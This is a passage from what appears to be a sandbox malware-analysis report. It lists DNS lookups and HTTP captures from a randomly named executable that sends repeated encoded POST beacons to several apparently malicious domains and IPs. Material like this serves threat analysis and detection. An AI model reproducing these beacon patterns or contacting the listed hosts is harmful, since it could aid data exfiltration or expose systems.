                                                      Jul 9, 2024 12:09:02.678003073 CEST1.1.1.1192.168.2.90x2cebNo error (0)weien.cdn.youziyuncdn.com134.122.138.60A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:16.550077915 CEST1.1.1.1192.168.2.90x7363No error (0)www.dynamologistics.net35.212.86.52A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:30.193000078 CEST1.1.1.1192.168.2.90xf60dNo error (0)www.globaltrend.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:30.193000078 CEST1.1.1.1192.168.2.90xf60dNo error (0)www.globaltrend.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:45.038877010 CEST1.1.1.1192.168.2.90x66b8No error (0)www.ffi07s.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:09:45.038877010 CEST1.1.1.1192.168.2.90x66b8No error (0)www.ffi07s.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178251028 CEST1.1.1.1192.168.2.90x9e8fNo error (0)www.j51a.xyzhuayang.302.gn301.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178251028 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz154.12.34.252A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178251028 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz154.222.238.52A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178251028 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz172.247.15.110A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178251028 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz172.247.21.75A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178251028 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz154.12.34.91A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178312063 CEST1.1.1.1192.168.2.90x9e8fNo error (0)www.j51a.xyzhuayang.302.gn301.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178312063 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz154.12.34.252A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178312063 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz154.222.238.52A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178312063 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz172.247.15.110A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178312063 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz172.247.21.75A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:00.178312063 CEST1.1.1.1192.168.2.90x9e8fNo error (0)huayang.302.gn301.xyz154.12.34.91A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:13.738733053 CEST1.1.1.1192.168.2.90x2ea6No error (0)www.dospole.top162.254.38.56A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:27.323451996 CEST1.1.1.1192.168.2.90xc924No error (0)www.tp-consulting.net5.252.229.221A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:40.799731970 CEST1.1.1.1192.168.2.90x39b1No error (0)www.lexpaidshares.onlineghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 9, 2024 12:10:40.799731970 CEST1.1.1.1192.168.2.90x39b1No error (0)ghs.googlehosted.com142.250.185.147A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:10:54.475109100 CEST1.1.1.1192.168.2.90x4dd5No error (0)www.viertage.work185.181.104.242A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:11:08.916131020 CEST1.1.1.1192.168.2.90x415bNo error (0)www.9988566a4.shoptou6y19.tta88.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 9, 2024 12:11:08.916131020 CEST1.1.1.1192.168.2.90x415bNo error (0)tou6y19.tta88.com38.145.202.186A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:11:23.394615889 CEST1.1.1.1192.168.2.90xc5c2No error (0)www.rightol.netrightol.netCNAME (Canonical name)IN (0x0001)false
                                                      Jul 9, 2024 12:11:23.394615889 CEST1.1.1.1192.168.2.90xc5c2No error (0)rightol.net94.130.217.114A (IP address)IN (0x0001)false
                                                      Jul 9, 2024 12:11:37.052222967 CEST1.1.1.1192.168.2.90x5787No error (0)www.wegamovies.onlinewegamovies.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Jul 9, 2024 12:11:37.052222967 CEST1.1.1.1192.168.2.90x5787No error (0)wegamovies.online84.32.84.32A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.u9games.xyz
                                                      • www.dtalengineering.com
                                                      • www.alphacentura.com
                                                      • www.xn72dkd7scx.shop
                                                      • www.dynamologistics.net
                                                      • www.globaltrend.xyz
                                                      • www.ffi07s.xyz
                                                      • www.j51a.xyz
                                                      • www.dospole.top
                                                      • www.tp-consulting.net
                                                      • www.lexpaidshares.online
                                                      • www.viertage.work
                                                      • www.9988566a4.shop

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.949715142.250.185.211805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:11.644896984 CEST563OUTGET /5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.u9games.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:08:12.352881908 CEST540INHTTP/1.1 301 Moved Permanently
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 09 Jul 2024 10:08:12 GMT
                                                      Location: https://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw%3D%3D
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.949716103.42.108.46805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:32.822232962 CEST844OUTPOST /la5g/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dtalengineering.com
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dtalengineering.com
                                                      Referer: http://www.dtalengineering.com/la5g/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 78 6b 39 2b 53 72 53 75 73 45 56 74 6f 42 54 31 6a 42 51 72 47 6a 38 45 51 59 53 66 56 67 33 61 67 79 76 6c 43 4f 70 63 69 31 77 78 45 72 74 56 61 77 55 6e 35 58 30 63 71 62 71 39 48 5a 78 77 2f 74 46 53 6f 59 74 49 73 43 67 64 4e 73 35 4f 66 49 2f 50 6c 2b 42 30 41 46 75 4e 79 33 72 5a 6e 64 6b 52 45 6b 42 48 32 55 51 49 59 78 78 74 38 53 2f 76 43 65 6a 6b 44 75 66 79 54 36 58 61 75 5a 69 41 73 67 70 75 57 70 50 31 6d 4b 68 36 41 30 6c 47 4f 34 58 74 4f 50 32 78 37 47 34 78 59 38 59 7a 70 51 30 62 7a 5a 39 4b 70 42 53 4f
                                                      Data Ascii: lv-=4Nn157qKjsX4xk9+SrSusEVtoBT1jBQrGj8EQYSfVg3agyvlCOpci1wxErtVawUn5X0cqbq9HZxw/tFSoYtIsCgdNs5OfI/Pl+B0AFuNy3rZndkREkBH2UQIYxxt8S/vCejkDufyT6XauZiAsgpuWpP1mKh6A0lGO4XtOP2x7G4xY8YzpQ0bzZ9KpBSO
                                                      Jul 9, 2024 12:08:33.693687916 CEST170INHTTP/1.1 405 Method Not Allowed
                                                      Content-Type: text/plain; charset=utf-8
                                                      Date: Tue, 09 Jul 2024 10:08:33 GMT
                                                      Content-Length: 18
                                                      Connection: close
                                                      Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                                      Data Ascii: Method Not Allowed


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.949717103.42.108.46805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:35.398618937 CEST868OUTPOST /la5g/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dtalengineering.com
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dtalengineering.com
                                                      Referer: http://www.dtalengineering.com/la5g/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 77 46 74 2b 55 4d 6d 75 37 55 56 75 6d 68 54 31 34 52 51 76 47 6a 77 45 51 64 71 50 56 53 6a 61 67 54 66 6c 44 4c 64 63 6a 31 77 78 4d 4c 74 63 56 51 55 67 35 58 49 6c 71 61 57 39 48 59 52 77 2f 76 64 53 6f 76 78 58 74 53 67 66 46 4d 35 4d 52 6f 2f 50 6c 2b 42 30 41 46 37 59 79 33 6a 5a 6e 74 55 52 46 41 56 45 70 6b 51 4c 49 68 78 74 74 69 2f 72 43 65 6a 4e 44 72 48 49 54 34 2f 61 75 63 4f 41 39 52 70 74 63 70 50 76 37 36 67 61 49 6d 30 53 42 70 48 44 44 2b 53 4c 35 56 41 59 62 64 34 74 34 69 39 41 6d 4f 39 74 75 6d 62 6d 6f 46 34 4f 34 76 57 2b 35 75 59 73 71 4d 37 4b 65 47 44 70 37 51 3d 3d
                                                      Data Ascii: lv-=4Nn157qKjsX4wFt+UMmu7UVumhT14RQvGjwEQdqPVSjagTflDLdcj1wxMLtcVQUg5XIlqaW9HYRw/vdSovxXtSgfFM5MRo/Pl+B0AF7Yy3jZntURFAVEpkQLIhxtti/rCejNDrHIT4/aucOA9RptcpPv76gaIm0SBpHDD+SL5VAYbd4t4i9AmO9tumbmoF4O4vW+5uYsqM7KeGDp7Q==
                                                      Jul 9, 2024 12:08:36.267995119 CEST170INHTTP/1.1 405 Method Not Allowed
                                                      Content-Type: text/plain; charset=utf-8
                                                      Date: Tue, 09 Jul 2024 10:08:36 GMT
                                                      Content-Length: 18
                                                      Connection: close
                                                      Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                                      Data Ascii: Method Not Allowed


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.949718103.42.108.46805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:37.977267981 CEST1881OUTPOST /la5g/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dtalengineering.com
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.dtalengineering.com
                                                      Referer: http://www.dtalengineering.com/la5g/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Data Raw: 6c 76 2d 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 77 46 74 2b 55 4d 6d 75 37 55 56 75 6d 68 54 31 34 52 51 76 47 6a 77 45 51 64 71 50 56 53 62 61 68 68 58 6c 42 6f 46 63 6c 46 77 78 47 72 74 52 56 51 55 78 35 58 51 68 71 61 62 4b 48 64 56 77 39 4d 56 53 75 64 5a 58 6a 53 67 66 4a 73 35 4e 66 49 2f 57 6c 2b 52 77 41 46 72 59 79 33 6a 5a 6e 76 4d 52 41 6b 42 45 36 30 51 49 59 78 78 68 38 53 2b 30 43 66 4c 33 44 72 79 31 55 49 66 61 75 38 65 41 75 44 78 74 47 70 50 78 36 36 67 34 49 6d 34 6b 42 70 61 34 44 2b 57 68 35 57 67 59 4b 34 5a 4e 70 78 4e 4c 31 74 67 46 68 57 33 7a 67 46 6c 72 68 50 79 35 35 50 45 2b 37 74 2b 69 4c 30 47 4c 34 6d 69 78 4e 66 77 2b 56 33 43 62 4d 74 36 6f 48 44 31 6e 6c 6a 52 5a 67 38 58 4b 54 59 2b 54 78 31 4e 39 63 65 76 62 39 4a 35 42 32 78 4c 79 63 67 30 7a 4f 79 66 75 4f 44 34 4b 79 73 68 43 34 48 54 41 32 37 57 38 67 44 48 58 43 53 33 4f 30 58 32 66 65 43 66 2b 64 4b 51 65 57 31 39 5a 35 6a 6b 63 36 38 52 70 39 70 79 54 6e 33 4b 30 69 34 6e 5a 2f 31 76 62 30 70 75 4d 36 4d [TRUNCATED]
                                                      Data Ascii: lv-=4Nn157qKjsX4wFt+UMmu7UVumhT14RQvGjwEQdqPVSbahhXlBoFclFwxGrtRVQUx5XQhqabKHdVw9MVSudZXjSgfJs5NfI/Wl+RwAFrYy3jZnvMRAkBE60QIYxxh8S+0CfL3Dry1UIfau8eAuDxtGpPx66g4Im4kBpa4D+Wh5WgYK4ZNpxNL1tgFhW3zgFlrhPy55PE+7t+iL0GL4mixNfw+V3CbMt6oHD1nljRZg8XKTY+Tx1N9cevb9J5B2xLycg0zOyfuOD4KyshC4HTA27W8gDHXCS3O0X2feCf+dKQeW19Z5jkc68Rp9pyTn3K0i4nZ/1vb0puM6MhEkvT2TBFXMdMSk/CzYJFw1p6DI1lMUs5HnJujCoWnoAyR6ECkMlulYWhXI6rINmg0csMF8KZO3W+fGD4iy3S7uxa9D0xMK+MuI2VttrzAvOuBjP8M67qxtjAS7fZmdSCdbBOkrPo4Jz2aZPwBkB0Dpi+bK4tQlUk3ZxmoArNcxvWyENImIFd80+BmSIVtFEKRufkT9glVqGopY63RVxCJAcCVB6ho4CLOQgQBwabDcsMcrSBDHZ5l95d0iuu25MvdHhEnAN4UGNTBpj8tz+82O9+H19elNQVRTo50FdxdwNsSzRlGBcg8AIYbvk/bw2hqupWJ8K0mL0P5ab+1LDYuV21Gb6OrQAQjDbxr3rxQGv4+VluoNgCrJfqWOFJf1n7eMcqVWzIwLt5hixKxLSskbzoD15ag5fToqaxNueO7gVIjtf3Uyq5G+OPnZtpupAxed+HN75OmAl3gH/xssNl51VKRECQxNWXm1Cl8h2Xi0CdJSUMpj0WbmIHbmCJhoMFjGGEbkIhQJbAFM4jtEXylsPnb7zGKyVYKzb0O/2pnQDO7FSMlXtIDMydke5y4V6nfciwPBvgthUhvPatytIN9N4wPFPxsgufAt/bUZEI7xAYBj/OyFlARa3m98ZgmsAfgBW/hV/Mc144M5bgAIGVfdtWlMtc06h8W [TRUNCATED]
                                                      Jul 9, 2024 12:08:38.824285984 CEST170INHTTP/1.1 405 Method Not Allowed
                                                      Content-Type: text/plain; charset=utf-8
                                                      Date: Tue, 09 Jul 2024 10:08:38 GMT
                                                      Content-Length: 18
                                                      Connection: close
                                                      Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                                      Data Ascii: Method Not Allowed


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.949719103.42.108.46805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:40.543473959 CEST571OUTGET /la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJw HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.dtalengineering.com
                                                      Connection: close
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:08:41.443200111 CEST1236INHTTP/1.1 200 OK
                                                      Cache-Control: no-cache, private
                                                      Content-Type: text/html; charset=UTF-8
                                                      Date: Tue, 09 Jul 2024 10:08:41 GMT
                                                      Connection: close
                                                      Transfer-Encoding: chunked
                                                      Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 41 55 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 74 72 61 69 70 2e 63 6f 6d 2e 61 75 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 79 6e 65 72 67 79 77 68 6f 6c 65 73 61 6c 65 2e 63 6f 6d 2f 6d 61 6e 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 35 36 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 44 72 6f 69 64 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e [TRUNCATED]
                                                      Data Ascii: 8000<!DOCTYPE html> <html lang=en-AU><head><link rel="icon" type="image/x-icon" href="https://ventraip.com.au/favicon.ico"><link rel="stylesheet" href="//static.synergywholesale.com/manage/style.css?v=563" type="text/css"><link href="//fonts.googleapis.com/css?family=Droid+Sans:400,700" rel="stylesheet" type="text/css"><script type="text/javascript" src="/inc/js/components/jquery-3.5.1.min.js"></script><script type="text/javascript" src="/inc/js/components/client.js"></script><link rel="stylesheet" href="/inc/js/components/Aristo.css" type="text/css" /><script type="text/javascript" src="/inc/js/components/jquery-ui.min.js?v=2"></script><link rel="stylesheet" href="/inc/js/components/fancybox.min.css" type="text/css" /><link rel="stylesheet" href="/inc/style/scss/timepicker.css"><link rel="stylesheet" href="/inc/js/components/chosen.css"><script type="text/javascript" src="/inc/js/components/polyfill.min.js"></script><script type="text/jav [TRUNCATED]
                                                      Jul 9, 2024 12:08:41.443227053 CEST1236INData Raw: 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 69 6e 63 2f 6a 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 66 61 6e 63 79 62 6f 78 2e 6d
                                                      Data Ascii: js"></script><script type="text/javascript" src="/inc/js/components/fancybox.min.js"></script><script type="text/javascript" src="/inc/js/components/sweetalert2.min.js"></script><script type="text/javascript" src="/inc/js/component
                                                      Jul 9, 2024 12:08:41.443243027 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: width: 100%; display: flex; justify-content: center; max-width: 95vw; } td input, td select { width: 100%;
                                                      Jul 9, 2024 12:08:41.443346024 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 39 30 76 77 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 34 70 78 20 61 75 74 6f 20 21 69 6d
                                                      Data Ascii: max-width: 90vw !important; margin: 4px auto !important } } #personal_details { align-items: center; } .input {
                                                      Jul 9, 2024 12:08:41.443361998 CEST1236INData Raw: 69 6e 3a 20 34 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67
                                                      Data Ascii: in: 4px 0; } input[type=submit] { background: linear-gradient(45deg,#e32f9b 14.6%,#fc35ad 85.4%) !important; border: 0; height: 56px; min-width: 170p
                                                      Jul 9, 2024 12:08:41.443377972 CEST1236INData Raw: 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 20 53 74 61 72 74 20 4c 6c 65 79 74 6f 6e 20 53 74 79 6c 69 6e 67 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 76 2e 74 65 6d 70 6c 61 74 65 2d 63 65 6e 74 65
                                                      Data Ascii: } /* Start Lleyton Styling */ div.template-center { width: 100%; overflow: hidden; margin: 0 0 auto; } #identity-verification > h2 {
                                                      Jul 9, 2024 12:08:41.443394899 CEST1236INData Raw: 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23
                                                      Data Ascii: flex-wrap: wrap; padding: 0 20px; } #verify-form .document-types__select > label { display: flex; flex-direction: column; align-items: center;
                                                      Jul 9, 2024 12:08:41.443748951 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6d 65 64 69 63 61 72 65 2d 63 61 72 64 2d 6e 75 6d 62 65 72
                                                      Data Ascii: margin-top: 2px; } .medicare-card-number:first-of-type { margin-right: 8px; } h1, h2, h3, h4, h5, h6 { color: white !important;
                                                      Jul 9, 2024 12:08:41.443764925 CEST1236INData Raw: 64 74 68 3a 31 32 30 30 70 78 29 7b 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 30 2e 34 70 78 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e
                                                      Data Ascii: dth:1200px){h1{font-size:38px;line-height:50.4px}}@supports (-webkit-font-smoothing:antialiased){.h1.bold,.h2.bold,.h3.bold,.h4.bold,.h5.bold,.h6.bold,h1.bold,h2.bold,h3.bold,h4.bold,h5.bold,h6.bold{font-weight:700}}@supports (-webkit-font-smo
                                                      Jul 9, 2024 12:08:41.443783045 CEST1236INData Raw: 68 3a 39 39 31 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 7b 6d 61 78 2d 77 69 64 74 68 3a 37 30 38 70 78 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 20 61 6e 64 20 28
                                                      Data Ascii: h:991px){.contain{max-width:708px}}@media only screen and (max-width:1200px) and (max-width:767px){.contain{max-width:95vw}}main{display:flex;flex-direction:column}@keyframes relative{0%{position:relative}to{position:relative}}.colorize,.color
                                                      Jul 9, 2024 12:08:41.448679924 CEST1236INData Raw: 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2e 69 63 6f 6e 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 34 37 22 7d 2e 69 63 6f 6e 2d 79 6f 75
                                                      Data Ascii: ;-moz-osx-font-smoothing:grayscale}.icon-facebook:before{content:"\e947"}.icon-youtube:before{content:"\e948"}.icon-twitter:before{content:"\e949"}.icon-instagram:before{content:"\e94a"}@keyframes fadein{0%{-ms-filter:"progid:DXImageTransform.


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.949720188.114.96.3805488C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 9, 2024 12:08:47.740792990 CEST835OUTPOST /mnr7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.5
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.alphacentura.com
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: max-age=0
                                                      Origin: http://www.alphacentura.com
                                                      Referer: http://www.alphacentura.com/mnr7/
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
